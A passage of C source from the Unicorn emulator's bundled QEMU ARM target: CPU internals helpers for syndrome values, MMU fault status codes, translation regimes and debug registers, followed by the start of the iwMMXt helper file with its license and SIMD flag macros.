arm_pamax * @cpu: ARMCPU * * Returns the implementation defined bit-width of physical addresses. * The ARMv8 reference manuals refer to this as PAMax(). */ static inline unsigned int arm_pamax(ARMCPU *cpu) { static const unsigned int pamax_map[] = { [0] = 32, [1] = 36, [2] = 40, [3] = 42, [4] = 44, [5] = 48, }; unsigned int parange = FIELD_EX64(cpu->isar.id_aa64mmfr0, ID_AA64MMFR0, PARANGE); /* id_aa64mmfr0 is a read-only register so values outside of the * supported mappings can be considered an implementation error. */ assert(parange < ARRAY_SIZE(pamax_map)); return pamax_map[parange]; } /* Return true if extended addresses are enabled. * This is always the case if our translation regime is 64 bit, * but depends on TTBCR.EAE for 32 bit. */ static inline bool extended_addresses_enabled(CPUARMState *env) { TCR *tcr = &env->cp15.tcr_el[arm_is_secure(env) ? 3 : 1]; return arm_el_is_aa64(env, 1) || (arm_feature(env, ARM_FEATURE_LPAE) && (tcr->raw_tcr & TTBCR_EAE)); } /* Valid Syndrome Register EC field values */ enum arm_exception_class { EC_UNCATEGORIZED = 0x00, EC_WFX_TRAP = 0x01, EC_CP15RTTRAP = 0x03, EC_CP15RRTTRAP = 0x04, EC_CP14RTTRAP = 0x05, EC_CP14DTTRAP = 0x06, EC_ADVSIMDFPACCESSTRAP = 0x07, EC_FPIDTRAP = 0x08, EC_PACTRAP = 0x09, EC_CP14RRTTRAP = 0x0c, EC_BTITRAP = 0x0d, EC_ILLEGALSTATE = 0x0e, EC_AA32_SVC = 0x11, EC_AA32_HVC = 0x12, EC_AA32_SMC = 0x13, EC_AA64_SVC = 0x15, EC_AA64_HVC = 0x16, EC_AA64_SMC = 0x17, EC_SYSTEMREGISTERTRAP = 0x18, EC_SVEACCESSTRAP = 0x19, EC_INSNABORT = 0x20, EC_INSNABORT_SAME_EL = 0x21, EC_PCALIGNMENT = 0x22, EC_DATAABORT = 0x24, EC_DATAABORT_SAME_EL = 0x25, EC_SPALIGNMENT = 0x26, EC_AA32_FPTRAP = 0x28, EC_AA64_FPTRAP = 0x2c, EC_SERROR = 0x2f, EC_BREAKPOINT = 0x30, EC_BREAKPOINT_SAME_EL = 0x31, EC_SOFTWARESTEP = 0x32, EC_SOFTWARESTEP_SAME_EL = 0x33, EC_WATCHPOINT = 0x34, EC_WATCHPOINT_SAME_EL = 0x35, EC_AA32_BKPT = 0x38, EC_VECTORCATCH = 0x3a, EC_AA64_BKPT = 0x3c, }; #define ARM_EL_EC_SHIFT 26 #define ARM_EL_IL_SHIFT 25 #define ARM_EL_ISV_SHIFT 24 #define ARM_EL_IL (1 << ARM_EL_IL_SHIFT) #define ARM_EL_ISV (1 << ARM_EL_ISV_SHIFT) static inline uint32_t syn_get_ec(uint32_t syn) { return syn >> ARM_EL_EC_SHIFT; } /* Utility functions for constructing various kinds of syndrome value. * Note that in general we follow the AArch64 syndrome values; in a * few cases the value in HSR for exceptions taken to AArch32 Hyp * mode differs slightly, and we fix this up when populating HSR in * arm_cpu_do_interrupt_aarch32_hyp(). * The exception is FP/SIMD access traps -- these report extra information * when taking an exception to AArch32. For those we include the extra coproc * and TA fields, and mask them out when taking the exception to AArch64. */ static inline uint32_t syn_uncategorized(void) { return (EC_UNCATEGORIZED << ARM_EL_EC_SHIFT) | ARM_EL_IL; } static inline uint32_t syn_aa64_svc(uint32_t imm16) { return (EC_AA64_SVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa64_hvc(uint32_t imm16) { return (EC_AA64_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa64_smc(uint32_t imm16) { return (EC_AA64_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_svc(uint32_t imm16, bool is_16bit) { return (EC_AA32_SVC << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) | (is_16bit ? 0 : ARM_EL_IL); } static inline uint32_t syn_aa32_hvc(uint32_t imm16) { return (EC_AA32_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_smc(void) { return (EC_AA32_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL; } static inline uint32_t syn_aa64_bkpt(uint32_t imm16) { return (EC_AA64_BKPT << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_bkpt(uint32_t imm16, bool is_16bit) { return (EC_AA32_BKPT << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) | (is_16bit ? 0 : ARM_EL_IL); } static inline uint32_t syn_aa64_sysregtrap(int op0, int op1, int op2, int crn, int crm, int rt, int isread) { return (EC_SYSTEMREGISTERTRAP << ARM_EL_EC_SHIFT) | ARM_EL_IL | (op0 << 20) | (op2 << 17) | (op1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp14_rt_trap(int cv, int cond, int opc1, int opc2, int crn, int crm, int rt, int isread, bool is_16bit) { return (EC_CP14RTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp15_rt_trap(int cv, int cond, int opc1, int opc2, int crn, int crm, int rt, int isread, bool is_16bit) { return (EC_CP15RTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp14_rrt_trap(int cv, int cond, int opc1, int crm, int rt, int rt2, int isread, bool is_16bit) { return (EC_CP14RRTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc1 << 16) | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp15_rrt_trap(int cv, int cond, int opc1, int crm, int rt, int rt2, int isread, bool is_16bit) { return (EC_CP15RRTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc1 << 16) | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_fp_access_trap(int cv, int cond, bool is_16bit) { /* AArch32 FP trap or any AArch64 FP/SIMD trap: TA == 0 coproc == 0xa */ return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | 0xa; } static inline uint32_t syn_simd_access_trap(int cv, int cond, bool is_16bit) { /* AArch32 SIMD trap: TA == 1 coproc == 0 */ return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (1 << 5); } static inline uint32_t syn_sve_access_trap(void) { return EC_SVEACCESSTRAP << ARM_EL_EC_SHIFT; } static inline uint32_t syn_pactrap(void) { return EC_PACTRAP << ARM_EL_EC_SHIFT; } static inline uint32_t syn_btitrap(int btype) { return (EC_BTITRAP << ARM_EL_EC_SHIFT) | btype; } static inline uint32_t syn_insn_abort(int same_el, int ea, int s1ptw, int fsc) { return (EC_INSNABORT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (ea << 9) | (s1ptw << 7) | fsc; } static inline uint32_t syn_data_abort_no_iss(int same_el, int ea, int cm, int s1ptw, int wnr, int fsc) { return (EC_DATAABORT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) | fsc; } static inline uint32_t syn_data_abort_with_iss(int same_el, int sas, int sse, int srt, int sf, int ar, int ea, int cm, int s1ptw, int wnr, int fsc, bool is_16bit) { return ( (uint32_t)EC_DATAABORT << ARM_EL_EC_SHIFT) | ( (uint32_t)same_el << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | ARM_EL_ISV | (sas << 22) | (sse << 21) | (srt << 16) | (sf << 15) | (ar << 14) | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) | fsc; } static inline uint32_t syn_swstep(int same_el, int isv, int ex) { return (EC_SOFTWARESTEP << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (isv << 24) | (ex << 6) | 0x22; } static inline uint32_t syn_watchpoint(int same_el, int cm, int wnr) { return (EC_WATCHPOINT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (cm << 8) | (wnr << 6) | 0x22; } static inline uint32_t syn_breakpoint(int same_el) { return (EC_BREAKPOINT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | 0x22; } static inline uint32_t syn_wfx(int cv, int cond, int ti, bool is_16bit) { return (EC_WFX_TRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : (1 << ARM_EL_IL_SHIFT)) | (cv << 24) | (cond << 20) | ti; } /* Update a QEMU watchpoint based on the information the guest has set in the * DBGWCR<n>_EL1 and DBGWVR<n>_EL1 registers. */ void hw_watchpoint_update(ARMCPU *cpu, int n); /* Update the QEMU watchpoints for every guest watchpoint. This does a * complete delete-and-reinstate of the QEMU watchpoint list and so is * suitable for use after migration or on reset. */ void hw_watchpoint_update_all(ARMCPU *cpu); /* Update a QEMU breakpoint based on the information the guest has set in the * DBGBCR<n>_EL1 and DBGBVR<n>_EL1 registers. */ void hw_breakpoint_update(ARMCPU *cpu, int n); /* Update the QEMU breakpoints for every guest breakpoint. This does a * complete delete-and-reinstate of the QEMU breakpoint list and so is * suitable for use after migration or on reset. */ void hw_breakpoint_update_all(ARMCPU *cpu); /* Callback function for checking if a watchpoint should trigger. */ bool arm_debug_check_watchpoint(CPUState *cs, CPUWatchpoint *wp); /* Adjust addresses (in BE32 mode) before testing against watchpoint * addresses. */ vaddr arm_adjust_watchpoint_address(CPUState *cs, vaddr addr, int len); /* Callback function for when a watchpoint or breakpoint triggers. */ void arm_debug_excp_handler(CPUState *cs); /* Return true if the r0/x0 value indicates that this SMC/HVC is a PSCI call. */ bool arm_is_psci_call(ARMCPU *cpu, int excp_type); /* Actually handle a PSCI call */ void arm_handle_psci_call(ARMCPU *cpu); /** * arm_clear_exclusive: clear the exclusive monitor * @env: CPU env * Clear the CPU's exclusive monitor, like the guest CLREX instruction. */ static inline void arm_clear_exclusive(CPUARMState *env) { env->exclusive_addr = -1; } /** * ARMFaultType: type of an ARM MMU fault * This corresponds to the v8A pseudocode's Fault enumeration, * with extensions for QEMU internal conditions. */ typedef enum ARMFaultType { ARMFault_None, ARMFault_AccessFlag, ARMFault_Alignment, ARMFault_Background, ARMFault_Domain, ARMFault_Permission, ARMFault_Translation, ARMFault_AddressSize, ARMFault_SyncExternal, ARMFault_SyncExternalOnWalk, ARMFault_SyncParity, ARMFault_SyncParityOnWalk, ARMFault_AsyncParity, ARMFault_AsyncExternal, ARMFault_Debug, ARMFault_TLBConflict, ARMFault_Lockdown, ARMFault_Exclusive, ARMFault_ICacheMaint, ARMFault_QEMU_NSCExec, /* v8M: NS executing in S&NSC memory */ ARMFault_QEMU_SFault, /* v8M: SecureFault INVTRAN, INVEP or AUVIOL */ } ARMFaultType; /** * ARMMMUFaultInfo: Information describing an ARM MMU Fault * @type: Type of fault * @level: Table walk level (for translation, access flag and permission faults) * @domain: Domain of the fault address (for non-LPAE CPUs only) * @s2addr: Address that caused a fault at stage 2 * @stage2: True if we faulted at stage 2 * @s1ptw: True if we faulted at stage 2 while doing a stage 1 page-table walk * @ea: True if we should set the EA (external abort type) bit in syndrome */ typedef struct ARMMMUFaultInfo ARMMMUFaultInfo; struct ARMMMUFaultInfo { ARMFaultType type; target_ulong s2addr; int level; int domain; bool stage2; bool s1ptw; bool ea; }; /** * arm_fi_to_sfsc: Convert fault info struct to short-format FSC * Compare pseudocode EncodeSDFSC(), though unlike that function * we set up a whole FSR-format code including domain field and * putting the high bit of the FSC into bit 10. */ static inline uint32_t arm_fi_to_sfsc(ARMMMUFaultInfo *fi) { uint32_t fsc = 0; switch (fi->type) { case ARMFault_None: return 0; case ARMFault_AccessFlag: fsc = fi->level == 1 ? 0x3 : 0x6; break; case ARMFault_Alignment: fsc = 0x1; break; case ARMFault_Permission: fsc = fi->level == 1 ? 0xd : 0xf; break; case ARMFault_Domain: fsc = fi->level == 1 ? 0x9 : 0xb; break; case ARMFault_Translation: fsc = fi->level == 1 ? 0x5 : 0x7; break; case ARMFault_SyncExternal: fsc = 0x8 | (fi->ea << 12); break; case ARMFault_SyncExternalOnWalk: fsc = fi->level == 1 ? 0xc : 0xe; fsc |= (fi->ea << 12); break; case ARMFault_SyncParity: fsc = 0x409; break; case ARMFault_SyncParityOnWalk: fsc = fi->level == 1 ? 0x40c : 0x40e; break; case ARMFault_AsyncParity: fsc = 0x408; break; case ARMFault_AsyncExternal: fsc = 0x406 | (fi->ea << 12); break; case ARMFault_Debug: fsc = 0x2; break; case ARMFault_TLBConflict: fsc = 0x400; break; case ARMFault_Lockdown: fsc = 0x404; break; case ARMFault_Exclusive: fsc = 0x405; break; case ARMFault_ICacheMaint: fsc = 0x4; break; case ARMFault_Background: fsc = 0x0; break; case ARMFault_QEMU_NSCExec: fsc = M_FAKE_FSR_NSC_EXEC; break; case ARMFault_QEMU_SFault: fsc = M_FAKE_FSR_SFAULT; break; default: /* Other faults can't occur in a context that requires a * short-format status code. */ g_assert_not_reached(); break; } fsc |= (fi->domain << 4); return fsc; } /** * arm_fi_to_lfsc: Convert fault info struct to long-format FSC * Compare pseudocode EncodeLDFSC(), though unlike that function * we fill in also the LPAE bit 9 of a DFSR format. */ static inline uint32_t arm_fi_to_lfsc(ARMMMUFaultInfo *fi) { uint32_t fsc = 0; switch (fi->type) { case ARMFault_None: return 0; case ARMFault_AddressSize: fsc = fi->level & 3; break; case ARMFault_AccessFlag: fsc = (fi->level & 3) | (0x2 << 2); break; case ARMFault_Permission: fsc = (fi->level & 3) | (0x3 << 2); break; case ARMFault_Translation: fsc = (fi->level & 3) | (0x1 << 2); break; case ARMFault_SyncExternal: fsc = 0x10 | (fi->ea << 12); break; case ARMFault_SyncExternalOnWalk: fsc = (fi->level & 3) | (0x5 << 2) | (fi->ea << 12); break; case ARMFault_SyncParity: fsc = 0x18; break; case ARMFault_SyncParityOnWalk: fsc = (fi->level & 3) | (0x7 << 2); break; case ARMFault_AsyncParity: fsc = 0x19; break; case ARMFault_AsyncExternal: fsc = 0x11 | (fi->ea << 12); break; case ARMFault_Alignment: fsc = 0x21; break; case ARMFault_Debug: fsc = 0x22; break; case ARMFault_TLBConflict: fsc = 0x30; break; case ARMFault_Lockdown: fsc = 0x34; break; case ARMFault_Exclusive: fsc = 0x35; break; default: /* Other faults can't occur in a context that requires a * long-format status code. */ g_assert_not_reached(); break; } fsc |= 1 << 9; return fsc; } static inline bool arm_extabort_type(MemTxResult result) { /* The EA bit in syndromes and fault status registers is an * IMPDEF classification of external aborts. ARM implementations * usually use this to indicate AXI bus Decode error (0) or * Slave error (1); in QEMU we follow that. */ return result != MEMTX_DECODE_ERROR; } bool arm_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); static inline int arm_to_core_mmu_idx(ARMMMUIdx mmu_idx) { return mmu_idx & ARM_MMU_IDX_COREIDX_MASK; } static inline ARMMMUIdx core_to_arm_mmu_idx(CPUARMState *env, int mmu_idx) { if (arm_feature(env, ARM_FEATURE_M)) { return mmu_idx | ARM_MMU_IDX_M; } else { return mmu_idx | ARM_MMU_IDX_A; } } static inline ARMMMUIdx core_to_aa64_mmu_idx(int mmu_idx) { /* AArch64 is always a-profile. */ return mmu_idx | ARM_MMU_IDX_A; } int arm_mmu_idx_to_el(ARMMMUIdx mmu_idx); /* * Return the MMU index for a v7M CPU with all relevant information * manually specified. */ ARMMMUIdx arm_v7m_mmu_idx_all(CPUARMState *env, bool secstate, bool priv, bool negpri); /* * Return the MMU index for a v7M CPU in the specified security and * privilege state. */ ARMMMUIdx arm_v7m_mmu_idx_for_secstate_and_priv(CPUARMState *env, bool secstate, bool priv); /* Return the MMU index for a v7M CPU in the specified security state */ ARMMMUIdx arm_v7m_mmu_idx_for_secstate(CPUARMState *env, bool secstate); /* Return true if the stage 1 translation regime is using LPAE format page * tables */ bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx); /* Raise a data fault alignment exception for the specified virtual address */ void arm_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); /* arm_cpu_do_transaction_failed: handle a memory system error response * (eg "no device/memory present at address") by raising an external abort * exception */ void arm_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); /* Call any registered EL change hooks */ static inline void arm_call_pre_el_change_hook(ARMCPU *cpu) { ARMELChangeHook *hook, *next; QLIST_FOREACH_SAFE(hook, &cpu->pre_el_change_hooks, node, next) { hook->hook(cpu, hook->opaque); } } static inline void arm_call_el_change_hook(ARMCPU *cpu) { ARMELChangeHook *hook, *next; QLIST_FOREACH_SAFE(hook, &cpu->el_change_hooks, node, next) { hook->hook(cpu, hook->opaque); } } /* Return true if this address translation regime has two ranges. */ static inline bool regime_has_2_ranges(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return true; default: return false; } } /* Return true if this address translation regime is secure */ static inline bool regime_is_secure(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E2: case ARMMMUIdx_Stage2: case ARMMMUIdx_MPrivNegPri: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPriv: case ARMMMUIdx_MUser: return false; case ARMMMUIdx_SE3: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: case ARMMMUIdx_MSPrivNegPri: case ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPriv: case ARMMMUIdx_MSUser: return true; default: g_assert_not_reached(); // never reach here return true; } } static inline bool regime_is_pan(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_SE10_1_PAN: return true; default: return false; } } /* Return the FSR value for a debug exception (watchpoint, hardware * breakpoint or BKPT insn) targeting the specified exception level. */ static inline uint32_t arm_debug_exception_fsr(CPUARMState *env) { ARMMMUFaultInfo fi = { .type = ARMFault_Debug }; int target_el = arm_debug_target_el(env); bool using_lpae = false; if (target_el == 2 || arm_el_is_aa64(env, target_el)) { using_lpae = true; } else { if (arm_feature(env, ARM_FEATURE_LPAE) && (env->cp15.tcr_el[target_el].raw_tcr & TTBCR_EAE)) { using_lpae = true; } } if (using_lpae) { return arm_fi_to_lfsc(&fi); } else { return arm_fi_to_sfsc(&fi); } } /** * arm_num_brps: Return number of implemented breakpoints. * Note that the ID register BRPS field is "number of bps - 1", * and we return the actual number of breakpoints. */ static inline int arm_num_brps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, BRPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, BRPS) + 1; } } /** * arm_num_wrps: Return number of implemented watchpoints. * Note that the ID register WRPS field is "number of wps - 1", * and we return the actual number of watchpoints. */ static inline int arm_num_wrps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, WRPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, WRPS) + 1; } } /** * arm_num_ctx_cmps: Return number of implemented context comparators. * Note that the ID register CTX_CMPS field is "number of cmps - 1", * and we return the actual number of comparators. */ static inline int arm_num_ctx_cmps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, CTX_CMPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, CTX_CMPS) + 1; } } /* Note make_memop_idx reserves 4 bits for mmu_idx, and MO_BSWAP is bit 3. * Thus a TCGMemOpIdx, without any MO_ALIGN bits, fits in 8 bits. */ #define MEMOPIDX_SHIFT 8 /** * v7m_using_psp: Return true if using process stack pointer * Return true if the CPU is currently using the process stack * pointer, or false if it is using the main stack pointer. */ static inline bool v7m_using_psp(CPUARMState *env) { /* Handler mode always uses the main stack; for thread mode * the CONTROL.SPSEL bit determines the answer. * Note that in v7M it is not possible to be in Handler mode with * CONTROL.SPSEL non-zero, but in v8M it is, so we must check both. */ return !arm_v7m_is_handler_mode(env) && env->v7m.control[env->v7m.secure] & R_V7M_CONTROL_SPSEL_MASK; } /** * v7m_sp_limit: Return SP limit for current CPU state * Return the SP limit value for the current CPU security state * and stack pointer. */ static inline uint32_t v7m_sp_limit(CPUARMState *env) { if (v7m_using_psp(env)) { return env->v7m.psplim[env->v7m.secure]; } else { return env->v7m.msplim[env->v7m.secure]; } } /** * v7m_cpacr_pass: * Return true if the v7M CPACR permits access to the FPU for the specified * security state and privilege level. */ static inline bool v7m_cpacr_pass(CPUARMState *env, bool is_secure, bool is_priv) { switch (extract32(env->v7m.cpacr[is_secure], 20, 2)) { case 0: case 2: /* UNPREDICTABLE: we treat like 0 */ return false; case 1: return is_priv; case 3: return true; default: g_assert_not_reached(); // never reach here return true; } } /** * aarch32_mode_name(): Return name of the AArch32 CPU mode * @psr: Program Status Register indicating CPU mode * * Returns, for debug logging purposes, a printable representation * of the AArch32 CPU mode ("svc", "usr", etc) as indicated by * the low bits of the specified PSR. */ static inline const char *aarch32_mode_name(uint32_t psr) { static const char cpu_mode_names[16][4] = { "usr", "fiq", "irq", "svc", "???", "???", "mon", "abt", "???", "???", "hyp", "und", "???", "???", "???", "sys" }; return cpu_mode_names[psr & 0xf]; } /** * arm_cpu_update_virq: Update CPU_INTERRUPT_VIRQ bit in cs->interrupt_request * * Update the CPU_INTERRUPT_VIRQ bit in cs->interrupt_request, following * a change to either the input VIRQ line from the GIC or the HCR_EL2.VI bit. * Must be called with the iothread lock held. */ void arm_cpu_update_virq(ARMCPU *cpu); /** * arm_cpu_update_vfiq: Update CPU_INTERRUPT_VFIQ bit in cs->interrupt_request * * Update the CPU_INTERRUPT_VFIQ bit in cs->interrupt_request, following * a change to either the input VFIQ line from the GIC or the HCR_EL2.VF bit. * Must be called with the iothread lock held. */ void arm_cpu_update_vfiq(ARMCPU *cpu); /** * arm_mmu_idx_el: * @env: The cpu environment * @el: The EL to use. * * Return the full ARMMMUIdx for the translation regime for EL. */ ARMMMUIdx arm_mmu_idx_el(CPUARMState *env, int el); /** * arm_mmu_idx: * @env: The cpu environment * * Return the full ARMMMUIdx for the current translation regime. */ ARMMMUIdx arm_mmu_idx(CPUARMState *env); /** * arm_stage1_mmu_idx: * @env: The cpu environment * * Return the ARMMMUIdx for the stage1 traversal for the current regime. */ ARMMMUIdx arm_stage1_mmu_idx(CPUARMState *env); /** * arm_mmu_idx_is_stage1_of_2: * @mmu_idx: The ARMMMUIdx to test * * Return true if @mmu_idx is a NOTLB mmu_idx that is the * first stage of a two stage regime. */ static inline bool arm_mmu_idx_is_stage1_of_2(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: return true; default: return false; } } static inline uint32_t aarch32_cpsr_valid_mask(uint64_t features, const ARMISARegisters *id) { uint32_t valid = CPSR_M | CPSR_AIF | CPSR_IL | CPSR_NZCV; if ((features >> ARM_FEATURE_V4T) & 1) { valid |= CPSR_T; } if ((features >> ARM_FEATURE_V5) & 1) { valid |= CPSR_Q; /* V5TE in reality*/ } if ((features >> ARM_FEATURE_V6) & 1) { valid |= CPSR_E | CPSR_GE; } if ((features >> ARM_FEATURE_THUMB2) & 1) { valid |= CPSR_IT; } if (isar_feature_aa32_jazelle(id)) { valid |= CPSR_J; } if (isar_feature_aa32_pan(id)) { valid |= CPSR_PAN; } return valid; } static inline uint32_t aarch64_pstate_valid_mask(const ARMISARegisters *id) { uint32_t valid; valid = PSTATE_M | PSTATE_DAIF | PSTATE_IL | PSTATE_SS | PSTATE_NZCV; if (isar_feature_aa64_bti(id)) { valid |= PSTATE_BTYPE; } if (isar_feature_aa64_pan(id)) { valid |= PSTATE_PAN; } if (isar_feature_aa64_uao(id)) { valid |= PSTATE_UAO; } return valid; } /* * Parameters of a given virtual address, as extracted from the * translation control register (TCR) for a given regime. */ typedef struct ARMVAParameters { unsigned tsz : 8; unsigned select : 1; bool tbi : 1; bool epd : 1; bool hpd : 1; bool using16k : 1; bool using64k : 1; } ARMVAParameters; ARMVAParameters aa64_va_parameters(CPUARMState *env, uint64_t va, ARMMMUIdx mmu_idx, bool data); static inline int exception_target_el(CPUARMState *env) { int target_el = MAX(1, arm_current_el(env)); /* * No such thing as secure EL1 if EL3 is aarch32, * so update the target EL to EL3 in this case. */ if (arm_is_secure(env) && !arm_el_is_aa64(env, 3) && target_el == 1) { target_el = 3; } return target_el; } /* Security attributes for an address, as returned by v8m_security_lookup. */ typedef struct V8M_SAttributes { bool subpage; /* true if these attrs don't cover the whole TARGET_PAGE */ bool ns; bool nsc; uint8_t sregion; bool srvalid; uint8_t iregion; bool irvalid; } V8M_SAttributes; void v8m_security_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, V8M_SAttributes *sattrs); bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, bool *is_subpage, ARMMMUFaultInfo *fi, uint32_t *mregion); /* Cacheability and shareability attributes for a memory access */ typedef struct ARMCacheAttrs { unsigned int attrs:8; /* as in the MAIR register encoding */ unsigned int shareability:2; /* as in the SH field of the VMSAv8-64 PTEs */ } ARMCacheAttrs; bool get_phys_addr(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs); void arm_log_exception(int idx); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/iwmmxt_helper.c�������������������������������������������������������0000664�0000000�0000000�00000066074�14675241067�0021265�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * iwMMXt micro operations for XScale. * * Copyright (c) 2007 OpenedHand, Ltd. * Written by Andrzej Zaborowski <andrew@openedhand.com> * Copyright (c) 2008 CodeSourcery * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* iwMMXt macros extracted from GNU gdb. */ /* Set the SIMD wCASF flags for 8, 16, 32 or 64-bit operations. */ #define SIMD8_SET(v, n, b) ((v != 0) << ((((b) + 1) * 4) + (n))) #define SIMD16_SET(v, n, h) ((v != 0) << ((((h) + 1) * 8) + (n))) #define SIMD32_SET(v, n, w) ((v != 0) << ((((w) + 1) * 16) + (n))) #define SIMD64_SET(v, n) ((v != 0) << (32 + (n))) /* Flags to pass as "n" above. */ #define SIMD_NBIT -1 #define SIMD_ZBIT -2 #define SIMD_CBIT -3 #define SIMD_VBIT -4 /* Various status bit macros. */ #define NBIT8(x) ((x) & 0x80) #define NBIT16(x) ((x) & 0x8000) #define NBIT32(x) ((x) & 0x80000000) #define NBIT64(x) ((x) & 0x8000000000000000ULL) #define ZBIT8(x) (((x) & 0xff) == 0) #define ZBIT16(x) (((x) & 0xffff) == 0) #define ZBIT32(x) (((x) & 0xffffffff) == 0) #define ZBIT64(x) (x == 0) /* Sign extension macros. */ #define EXTEND8H(a) ((uint16_t) (int8_t) (a)) #define 